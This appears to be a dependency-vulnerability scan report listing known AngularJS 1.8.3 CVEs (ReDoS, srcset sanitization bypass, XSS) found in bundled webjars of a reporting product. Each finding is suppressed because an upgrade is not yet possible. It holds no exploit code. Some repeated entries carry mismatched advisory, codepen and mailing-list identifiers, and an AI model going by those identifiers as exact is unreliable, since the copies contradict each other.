- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:windows:\*

[CVE-2024-8373](#) suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing).

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status).

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqmq-9-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*:\*

**CVE-2025-2336** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYaXx/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-4690** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-0716** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

**End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021** (RETIREJS) suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

## remotegui.zip: angular-cookies.jar: angular-cookies.min.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular-cookies.jar/META-INF/resources/webjars/angular-cookies/1.8.3/angular-cookies.min.js

**MD5:** c41aff8423276d46f0d02de6dcb71524

**SHA1:** 7dc53f75d5bf7dd2c770cb50f31242c70193c086

**SHA256:** 926509b494009bea03288bba191a2b238032188e9112377e50fbfe7814c6639b

**Referenced In Project/Scope:** server

### Evidence



### Suppressed Identifiers

- None

### Suppressed Vulnerabilities



[CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>



- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:-:\*:\*:\*:\*

#### [CVE-2024-21490](#) suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to [angular/core](https://www.npmjs.com/package/@angular/core).

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

#### [CVE-2022-25869](#) suppressed



All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN\\_LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSCORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*.\*

[CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)

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- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2qgx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

[CVE-2023-26118](#) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

#### [CVE-2024-8372](#) suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

#### Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here <https://docs.angularjs.org/misc/version-support-status> .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*

## **CVE-2024-8373** suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqm9-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*windows:\*

## **CVE-2025-2336** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYxX/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

## **CVE-2025-4690** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>

- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-0716** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

**End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021** (RETIREJS) suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

## remotegui.zip: angular-sanitize.jar: angular-sanitize.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular-sanitize.jar/META-INF/resources/webjars/angular-sanitize/1.8.3/angular-sanitize.js

**MD5:** 0127d7a139abfc8bd45875a9c8ea6348

**SHA1:** 197aea2acc25a0fa821766400950cac58a3627a5

**SHA256:** c84c65250afe5a1265f36a7e16c6010652e55c2ae3a779c351fb68536c42bf64

**Referenced In Project/Scope:** server

Evidence



Suppressed Identifiers

- None

**CVE-2022-25844** suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in `posPre: ' '.repeat()` of `NUMBER_FORMATS.PATTERNS[1].posPre` with a very high value.

**Note:** 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPPWSPSCSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPPWSPSCSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:\*:\*:\*:\*:\*

**CVE-2024-21490** suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the `ng-srcset` directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to `@angular/core` (<https://www.npmjs.com/package/@angular/core>).

CWE-1333 Inefficient Regular Expression Complexity



Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
